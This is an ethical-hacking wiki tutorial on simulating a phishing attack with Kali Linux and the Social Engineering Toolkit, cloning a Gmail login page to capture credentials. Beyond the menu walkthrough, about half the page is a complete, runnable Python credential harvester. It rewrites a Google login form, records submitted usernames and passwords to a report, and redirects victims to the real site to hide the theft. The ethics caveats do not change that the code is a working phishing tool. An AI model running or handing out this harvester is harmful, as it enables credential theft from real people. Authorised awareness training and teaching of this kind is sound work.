Hands-on: Simulasi Phishing Attack (en)

From OnnoWiki
Revision as of 06:51, 29 October 2024 by Onnowpurbo

Here is an explanation and example of a Phishing Attack simulation using Kali Linux 2024.3 in the context of an ethical hacking course.

Phishing Attack Overview

Phishing is a social engineering attack technique in which an attacker tricks a victim into entering sensitive information such as usernames, passwords, or credit card details into a fake website that looks like the legitimate one. This simulation uses the Social Engineering Toolkit (SET), which is installed on Kali Linux by default; SET fetches a copy of the real login page, rewrites it so that the login form posts back to the attacker's machine, and records whatever is submitted.

Hands-on Steps: Phishing Attack Simulation on Kali Linux 2024.3

1. Open Kali Linux and Run Social Engineering Toolkit (SET)

SET is a tool for simulating social engineering-based attacks such as phishing. It needs root because the credential harvester listens on TCP port 80, so run it with sudo:

sudo setoolkit

On first run SET asks you to accept its terms of use (answer y). The main menu then appears with several options. Select option 1, Social-Engineering Attacks.

2. Select Website Attack Vectors

In the Social-Engineering Attacks menu, select option 2 for *Website Attack Vectors*:

2) Website Attack Vectors

3. Select Credential Harvester Attack Method

Next, select the Credential Harvester method:

3) Credential Harvester Attack Method

This method will capture the credentials (username and password) entered by the victim on the phishing site.

4. Select Site Cloner

To create a fake site that looks like the original site, select the Site Cloner option:

2) Site Cloner

5. Enter Target URL

After selecting Site Cloner, you are asked for the URL of the site you want to clone (e.g., a Facebook or Gmail login page). For example, to fake the Gmail login page, type:

https://accounts.google.com

Note that pages which build their login form with JavaScript (modern Google and Facebook pages do) often do not clone cleanly; a simple server-rendered HTML login form, such as a lab web application, gives far more reliable results for a classroom exercise. Also keep in mind that the clone is served over plain HTTP from your Kali IP address, so the victim's address bar shows an IP rather than the real domain; that is exactly the cue an awareness exercise should teach people to notice.

6. IP Address Configuration

SET will ask for the IP address that the cloned form should POST back to, which is the address of your phishing server (the Kali machine SET is running on). The target must be able to reach this address, so on a lab network use the interface facing the target. To find the address, run either of the following:

ifconfig

ip -4 addr show

Then enter the IP address into SET when prompted.

7. Start Phishing Server

Once all the configurations are complete, SET starts a local web server on port 80 that serves the cloned page; the phishing URL is simply http://<your-IP>/. Every time the victim visits the phishing URL and enters their credentials, SET captures the submitted form data and then redirects the browser to the real site, so the attempt looks like an ordinary failed login.

8. Simulate Attack

  • Send the generated URL to the target via email, message, or other method. Make sure you have the target's permission, as this is part of ethical hacking.
  • When the victim visits the fake site and enters their credentials, this information will be captured by SET and displayed in your Kali Linux terminal.

9. Capture and Display Credentials

On the SET screen, you will see the results of successfully captured credentials:

[*] WE GOT A HIT! POST Data: user=exampleuser&pass=examplepassword

Here, the victim's username and password have been obtained from the fake login page. SET prints every submitted field and flags the ones whose names look like a username or password field. Press Ctrl-C when the exercise is finished; SET then generates a report of the captured hits.
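To make the nine menu steps above concrete, the following is an added example (not code from SET or from this page) that reproduces the mechanism behind Site Cloner and Credential Harvester in about sixty lines of Python: rewrite the cloned page's form action to post back to the attacker, serve the page, record each POST, and bounce the victim to the real site. The login page, field names, hint lists, port 8080 and report path are all constructed assumptions for the example; SET itself listens on port 80 and uses its own heuristics and report format.

```python
# Added example (not SET's own code): a minimal credential harvester that
# reproduces what SET's Site Cloner + Credential Harvester do behind the menus.
# The page contents, field names, port and report path are constructed.
import json
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Stand-in for the HTML the cloner would fetch from the target URL in step 5.
# Constructed inline so the example runs offline.
ORIGINAL_LOGIN_PAGE = """<html><body>
<form method="POST" action="https://accounts.google.com/signin/challenge">
  <input name="identifier" type="text">
  <input name="Passwd" type="password">
  <input type="submit" value="Next">
</form></body></html>"""

# Where a victim is bounced after submitting, so the "failed" login looks
# like an ordinary retry on the real site (assumption: same URL as step 5).
REDIRECT_TO = "https://accounts.google.com"

FORM_ACTION_RE = re.compile(r'(<form\b[^>]*?\baction=)(["\'])(.*?)\2',
                            re.IGNORECASE | re.DOTALL)

def rewrite_form_actions(html: str, post_back: str) -> str:
    """Site Cloner step: point every <form action> at the harvester (post_back)."""
    return FORM_ACTION_RE.sub(
        lambda m: f"{m.group(1)}{m.group(2)}{post_back}{m.group(2)}", html)

# Field-name substrings used to guess which fields hold credentials (constructed).
USERNAME_HINTS = ("user", "email", "login", "identifier", "name")
PASSWORD_HINTS = ("pass", "pwd")

def classify_post(body: str) -> dict:
    """Harvester step: parse an x-www-form-urlencoded body and guess which fields
    carry the username and password by field-name substring matching, the same
    idea as SET's 'POSSIBLE USERNAME/PASSWORD FIELD FOUND' output."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    hit = {"fields": fields, "username": None, "password": None}
    for name, value in fields.items():
        lname = name.lower()
        if hit["password"] is None and any(h in lname for h in PASSWORD_HINTS):
            hit["password"] = value
        elif hit["username"] is None and any(h in lname for h in USERNAME_HINTS):
            hit["username"] = value
    return hit

class HarvesterHandler(BaseHTTPRequestHandler):
    cloned_page = rewrite_form_actions(ORIGINAL_LOGIN_PAGE, "/").encode()
    captured = []  # every hit, like the report SET writes when you press Ctrl-C

    def do_GET(self):
        # Serve the rewritten clone to anyone who follows the phishing URL.
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.wfile.write(self.cloned_page)

    def do_POST(self):
        # Record the submitted form, then bounce the victim to the real site.
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", "replace")
        hit = classify_post(body)
        hit["client"] = self.client_address[0]
        HarvesterHandler.captured.append(hit)
        print(f"[*] WE GOT A HIT! POST Data: {body}")
        self.send_response(302)
        self.send_header("Location", REDIRECT_TO)
        self.end_headers()

def write_report(hits, path="harvester_report.json") -> int:
    """Persist captured hits as JSON; returns the number written."""
    with open(path, "w") as fh:
        json.dump(hits, fh, indent=2)
    return len(hits)

if __name__ == "__main__":
    # 8080 avoids needing root; SET listens on 80 so its URL carries no port.
    print("[*] Harvester listening on http://0.0.0.0:8080/ (Ctrl-C to stop)")
    try:
        HTTPServer(("0.0.0.0", 8080), HarvesterHandler).serve_forever()
    except KeyboardInterrupt:
        print(f"[*] Wrote {write_report(HarvesterHandler.captured)} hit(s)")
```

Run it, open http://<your-IP>:8080/ from another lab machine, submit the form, and the terminal prints the same kind of "WE GOT A HIT!" line shown above while the browser lands on the real site. The regex rewrite and the substring heuristics are deliberately simple; they are enough to show why a cloned page looks right but posts somewhere else, and why a field called Passwd still gets picked out as the password.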

Ethical Practices

Phishing is a dangerous attack method if misused. In the context of ethical hacking, this simulation must only be run with written permission from the owner of the systems and the people being tested, in an isolated lab or an authorised awareness campaign, and any credentials captured must be handled as sensitive data and deleted once the exercise is over.

Conclusion

The phishing attack simulation using Kali Linux 2024.3 and Social Engineering Toolkit (SET) provides a real-world view of how this attack is carried out. It is a great way to learn the important aspects of social engineering and helps raise awareness about cybersecurity among internet users.

Interesting Links